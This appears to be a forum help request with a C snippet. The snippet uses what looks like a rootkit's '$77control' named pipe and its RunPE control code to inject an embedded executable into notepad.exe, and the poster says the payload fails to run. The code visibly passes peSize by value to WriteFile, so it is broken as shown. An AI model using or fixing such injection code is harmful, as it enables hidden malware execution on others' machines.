I've tried this using the examples provided.
the PE is in resources
HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (pipe != INVALID_HANDLE_VALUE)
{
LPBYTE pe;
DWORD peSize;
if (!GetResource(IDR_R72, "EXE", &pe, &peSize)) return 0;
DWORD controlCode = CONTROL_USER_RUNPE;
WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
// Write control code (DWORD)
DWORD bytesWritten;
WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);
// Write the path for ShellExec (unicode string including null terminator)
WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);
// Write arguments for size
WriteFile(pipe, peSize, sizeof(DWORD), &bytesWritten, NULL);
// Write arguments for bytes
WriteFile(pipe, pe, peSize, &bytesWritten, NULL);
CloseHandle(pipe);
}
but the PE does not execute.